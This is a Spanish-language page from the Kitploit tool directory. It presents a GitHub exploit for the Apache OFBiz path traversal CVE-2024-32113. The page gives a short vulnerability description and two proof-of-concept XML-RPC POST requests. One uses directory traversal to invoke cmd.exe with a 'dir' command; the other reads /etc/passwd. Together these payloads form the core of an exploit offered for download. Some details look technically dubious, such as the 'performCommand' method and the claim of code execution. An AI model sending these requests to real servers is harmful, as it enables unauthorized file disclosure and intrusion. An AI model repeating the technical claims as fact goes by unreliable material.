Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Apache-OFBiz-Directory-Traversal-exploit — Exploit para Apache OFBiz CVE-2024-32113: path traversal mediante solicitudes XML-RPC manipuladas, que permite la lectura arbitraria de archivos y la posible ejecución de comandos en servidores vulnerables. | Kitploit
Herramientas/GitHubGitHub/absholi7ly/apache-ofbiz-directory-traversal-exploit
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebExfiltración de DatosSeguridad WebPruebas de Penetración
GitHubabsholi7ly/apache-ofbiz-directory-traversal-exploit

Apache-OFBiz-Directory-Traversal-exploit

Exploit para Apache OFBiz CVE-2024-32113: path traversal mediante solicitudes XML-RPC manipuladas, que permite la lectura arbitraria de archivos y la posible ejecución de comandos en servidores vulnerables.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
163hace 2 añosAún no revisado

Apache-OFBiz-Directory-Traversal-exploit

Se ha encontrado una vulnerabilidad clasificada como crítica en Apache OFBiz hasta la versión 18.12.12. Una funcionalidad desconocida se ve afectada por este problema. La manipulación con una entrada desconocida conduce a una vulnerabilidad de path traversal. El producto utiliza una entrada externa para construir una ruta destinada a identificar un archivo o directorio situado bajo un directorio principal restringido, pero el producto no neutraliza adecuadamente los elementos especiales dentro de la ruta que pueden hacer que esta se resuelva a una ubicación fuera del directorio restringido. Se ven afectadas la confidencialidad, la integridad y la disponibilidad.

Introducción

  • La vulnerabilidad CVE-2024-32113 permite la ejecución arbitraria de código en un servidor Apache OFBiz mediante el envío de una solicitud HTTP especialmente manipulada.
  • En esta solicitud, el atacante utiliza el parámetro ../../../../../../etc/passwd para apuntar al archivo etc/passwd en el servidor Apache OFBiz.
  • Cuando el servidor Apache OFBiz procesa esta solicitud, intentará leer el archivo etc/passwd, que contiene información sensible sobre los usuarios del servidor.
  • Esta información puede utilizarse para realizar más ataques contra el servidor, como robar datos, modificarlos o incluso eliminarlos.

Poc

1-

root@kitploit:~
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>performCommand</methodName>
  <params>
    <param>
      <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
    </param>
  </params>
</methodCall>

O

2-

root@kitploit:~
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>example.createBlogPost</methodName>
  <params>
    <param>
      <value><string>../../../../../../etc/passwd</string></value>
    </param>
  </params>
</methodCall>
Descargar herramienta